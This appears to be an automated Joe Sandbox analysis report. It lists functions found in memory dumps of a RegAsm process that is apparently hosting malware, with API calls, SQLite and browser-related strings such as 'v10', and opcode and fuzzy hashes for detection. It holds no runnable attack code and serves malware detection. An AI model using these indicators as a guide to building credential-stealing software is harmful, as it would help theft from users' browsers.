Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$unable to delete/modify collation sequence due to active statements
API String ID: 0-3348720253
Opcode ID: 599d4f6fd3d0de46d1d826e87e65f09ba258b5d209036250276c1e86d4d67d7c
Instruction ID: 0a709ca50be6ef6aa7afd139c419765f75ac9d5295f3bfbee1273757a6480d1a
Opcode Fuzzy Hash: 599d4f6fd3d0de46d1d826e87e65f09ba258b5d209036250276c1e86d4d67d7c
Instruction Fuzzy Hash: 69412BB26043405BD700AF24EC80BEBB7E4EFA5325F14456EF6999B282D332E519C761

Function 00406EF1 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00406EF6
memcmp.MSVCRT ref: 00406F1C
memset.MSVCRT ref: 00406F4B
LocalAlloc.KERNEL32(00000040,-000000E1,?,?,?,?,00000000,00000000), ref: 00406F80

Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735

Part of subcall function 0041077F: lstrlenA.KERNEL32(?,00000000,?,00417DE8,0042770E,0042770B,00000000,00000000,?,004187CB), ref: 00410788
Part of subcall function 0041077F: lstrcpy.KERNEL32(00000000,00000000), ref: 004107BC

Part of subcall function 00410742: lstrcpy.KERNEL32(00000000,FEE0858D), ref: 00410768

Strings

v10, xrefs: 00406F14

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$AllocH_prologLocallstrlenmemcmpmemset
String ID: v10
API String ID: 2733184300-1337588462
Opcode ID: 274425dc9dd2d5408ca2c1823e04d1afc33a5c5e84488e75787c78096f616c2b
Instruction ID: bc6bff1ab3669fb83834f3c9b010693020decb808c53772bcd62d52679a177a4
Opcode Fuzzy Hash: 274425dc9dd2d5408ca2c1823e04d1afc33a5c5e84488e75787c78096f616c2b
Instruction Fuzzy Hash: D8319DB1E00219ABCB10DF95DC95EEEBB78EF01358F10412FF822A6181D778AA55CB59

Function 1B75EBD0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 103COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B75EC42
CREATE , xrefs: 1B75EBFF
%s at line %d of [%.10s], xrefs: 1B75EC51
database corruption, xrefs: 1B75EC4C

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$CREATE $database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-1360532505
Opcode ID: bef99ae180e952773f283407dddcf002d63362c301da28b65c20c4bb6ed6cbb4
Instruction ID: 1b3086002b70dcfa8c08a4c2c529fe6f7f7bcc67d006b0dbe0e86a6deba3cd21
Opcode Fuzzy Hash: bef99ae180e952773f283407dddcf002d63362c301da28b65c20c4bb6ed6cbb4
Instruction Fuzzy Hash: 11313A629083C25ADF110A69AC40BFA7B95AB8562AF1445BFF8C54E283E726D181D731

Function 1B6B7050 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 98COMMON

Download Yara Rule

Strings

bad parameter or other API misuse, xrefs: 1B6B7083
invalid, xrefs: 1B6B706F
out of memory, xrefs: 1B6B7059, 1B6B70A2
API call with %s database connection pointer, xrefs: 1B6B7074

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: API call with %s database connection pointer$bad parameter or other API misuse$invalid$out of memory
API String ID: 0-453588374
Opcode ID: fe1c6c797c0f6f9eb983dc745aae3afa94e786702bb06b555961bdb87c8b33bc
Instruction ID: 0cf5a9b85d6956d7db5a122363f68ae52b33e3c5fc4b0d1c6855a31161fd090a
Opcode Fuzzy Hash: fe1c6c797c0f6f9eb983dc745aae3afa94e786702bb06b555961bdb87c8b33bc
Instruction Fuzzy Hash: 213127F1F4434157DF244B24EE0ABFB33765BA0B05F2D441AE4959B242D62DE88B83A1

Function 1B7393A0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 93COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B739446, 1B73948A
%s at line %d of [%.10s], xrefs: 1B739455, 1B739499
database corruption, xrefs: 1B739450, 1B739494

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: a17c0fafd9b407451b095737ef5a4895431ec2a129838729d8e99b2620362c4b
Instruction ID: c91d4d9801f6938cff12c7b6af10a8f58eaaaf9d2251b19660e8ce91ae14d9af
Opcode Fuzzy Hash: a17c0fafd9b407451b095737ef5a4895431ec2a129838729d8e99b2620362c4b
Instruction Fuzzy Hash: FD316975A04B904BC314DF28C890AF7BBF6AF89706B50849CE6C74B756E332E842C760

Function 1B691C60 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 88COMMON

Download Yara Rule

Strings

unknown database: %s, xrefs: 1B691CBD
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B691D3C
%s at line %d of [%.10s], xrefs: 1B691D4B
misuse, xrefs: 1B691D46

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$unknown database: %s
API String ID: 0-142545749
Opcode ID: 8bae666eb66eb5e74e06d7d47350957bcc17e5d9a9587067d597370920025e32
Instruction ID: f48570064c216a478ce388609a5296c8852772a73105eebca4681cc9c2761671
Opcode Fuzzy Hash: 8bae666eb66eb5e74e06d7d47350957bcc17e5d9a9587067d597370920025e32
Instruction Fuzzy Hash: 922105F5500741FFD7109E27BC44FDB76A9AFE2B19F20052DF8A956281D734A505C272

Function 1B6C3FF0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 85COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B6C407D, 1B6C40A8
%s at line %d of [%.10s], xrefs: 1B6C408C, 1B6C40B7
database corruption, xrefs: 1B6C4087, 1B6C40B2

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: 3da5f2c55a398cc2b22d1c615e07af4a9d9a3bd4cda431556f48f7f9b6026a72
Instruction ID: 979a694d186a22abe205b278b9b64b58eed3e6030942fdb2c34ab200b88864a8
Opcode Fuzzy Hash: 3da5f2c55a398cc2b22d1c615e07af4a9d9a3bd4cda431556f48f7f9b6026a72
Instruction Fuzzy Hash: 3121C1B7A452115BCB00DF18DC41AEB7BD4FBA8A51F42402AFD8497301E325D699C7E2

Function 1B739290 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 70COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B73929C, 1B73932A
%s at line %d of [%.10s], xrefs: 1B7392AB, 1B739339
database corruption, xrefs: 1B7392A6, 1B739334

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: 0a2d43994cc6dd973660a88bf8a9047e6e5534db67c50cfac5ef29f2794bc189
Instruction ID: ba294a82fe57be0f3a44185efd02f43692b4468cb24fb3431dcd0e26e67cb650
Opcode Fuzzy Hash: 0a2d43994cc6dd973660a88bf8a9047e6e5534db67c50cfac5ef29f2794bc189
Instruction Fuzzy Hash: 1A217925508B905AC3219F389C81AE7BFF5AF55701B45449CF1D387396E332E481C760

Function 0040EB37 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 63COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040EB4E

Part of subcall function 0041FAB0: std::exception::exception.LIBCMT ref: 0041FAC5
Part of subcall function 0041FAB0: __CxxThrowException@8.LIBCMT ref: 0041FADA
Part of subcall function 0041FAB0: std::exception::exception.LIBCMT ref: 0041FAEB

std::_Xinvalid_argument.LIBCPMT ref: 0040EB70
memcpy.MSVCRT ref: 0040EBAD

Strings

invalid string position, xrefs: 0040EB49
string too long, xrefs: 0040EB6B

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throwmemcpy
String ID: invalid string position$string too long
API String ID: 214693668-4289949731
Opcode ID: 046f17c3491fb6de0b61b79e339c676c81cd2b3016ea19a927114e91ef761e82
Instruction ID: e0fe832959dc5e7c627ff2559cbebd202760873d3578ed02ff6bc1c96de2b888
Opcode Fuzzy Hash: 046f17c3491fb6de0b61b79e339c676c81cd2b3016ea19a927114e91ef761e82
Instruction Fuzzy Hash: 10117C323102009BDB24DE1AD981A5AB3F8EF05714B100D3AF953AB2C1D7B8F9548799

Function 1B6A33C0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54COMMON

Download Yara Rule

Strings

CREATE TABLE x(pgno INTEGER PRIMARY KEY, data BLOB, schema HIDDEN), xrefs: 1B6A33D6

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: CREATE TABLE x(pgno INTEGER PRIMARY KEY, data BLOB, schema HIDDEN)
API String ID: 0-1935849370
Opcode ID: 652bc59e1cdc85b0ef7ec4df58b5d69040235427327700e4e43947cd2f49d191
Instruction ID: e4cc4278fde2373855c4e4805d3a01c2a2c04ae86cbecc37440a3690961e94e6
Opcode Fuzzy Hash: 652bc59e1cdc85b0ef7ec4df58b5d69040235427327700e4e43947cd2f49d191
Instruction Fuzzy Hash: 4B01F5797013164BDB01DF2DE841BCAB3D9EFD5311F058176F6008B240EBB4A8878BA1

Function 1B763E10 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45COMMON

Download Yara Rule

Strings

Wrong number of entries in %%%s table - expected %lld, actual %lld, xrefs: 1B763E6C
SELECT count(*) FROM %Q.'%q%s', xrefs: 1B763E26

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: SELECT count(*) FROM %Q.'%q%s'$Wrong number of entries in %%%s table - expected %lld, actual %lld
API String ID: 0-3026403748
Opcode ID: 9a8a694cdbfa75f9d67a58c6ed6041b98b5a30045ce7206028a7e6d51901f394
Instruction ID: 6182271fbaf6791a153213d57eac96eb44ae931f50a678d35c1c4b9b1c90ee69
Opcode Fuzzy Hash: 9a8a694cdbfa75f9d67a58c6ed6041b98b5a30045ce7206028a7e6d51901f394
Instruction Fuzzy Hash: 29F021B6C04381ABEA225A18AC81EFF36E5AFD5B01F06082CF88A61200D325F950C777

Function 1B835BC1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,FC40D37D,?,?,00000000,1B88D1CB,000000FF,?,1B835B30,?,?,1B835ADF,?), ref: 1B835BF6
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 1B835C08
FreeLibrary.KERNEL32(00000000,?,?,00000000,1B88D1CB,000000FF,?,1B835B30,?,?,1B835ADF,?), ref: 1B835C2A

Strings

CorExitProcess, xrefs: 1B835C00
mscoree.dll, xrefs: 1B835BEF

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: ddcce97d8833dcaaba34972ed9b06de12b8149ccda2cedd933bc76f8ee5cb915
Instruction ID: e1ba17db4cf3df5e0bc755d1a9bce5f805d9db622622aff9c77c00299eae7a39
Opcode Fuzzy Hash: ddcce97d8833dcaaba34972ed9b06de12b8149ccda2cedd933bc76f8ee5cb915
Instruction Fuzzy Hash: AE01627595456AEFDB059F90CD44BEEB7B8FB04F15F000A25E812A3290DB78D905CBA0

Function 1B7A6A20 Relevance: 8.0, APIs: 5, Instructions: 485COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d1013a7452b45f4713b043c6485fcee707689c2313245e20e693f89c5666af4
Instruction ID: 231fd7cc6dfcba2c5aae6aa4f9168c7dde0ba40a1b308d562418f5cd29ca0f45
Opcode Fuzzy Hash: 0d1013a7452b45f4713b043c6485fcee707689c2313245e20e693f89c5666af4
Instruction Fuzzy Hash: C9028EB0944316CFD784DF25D884B9AB7E4FF84B04F08462EF98997281E774E958CB92

Function 00411E3E Relevance: 7.6, APIs: 5, Instructions: 88COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00411E43
memset.MSVCRT ref: 00411E65

Part of subcall function 00411A94: GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,00411E92,00000000), ref: 00411A9F
Part of subcall function 00411A94: HeapAlloc.KERNEL32(00000000,?,00411E92,00000000), ref: 00411AA6
Part of subcall function 00411A94: wsprintfW.USER32 ref: 00411AB7

OpenProcess.KERNEL32(00001001,00000000,?,?,?), ref: 00411EEC
TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 00411EFA
CloseHandle.KERNEL32(00000000,?,?), ref: 00411F01

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
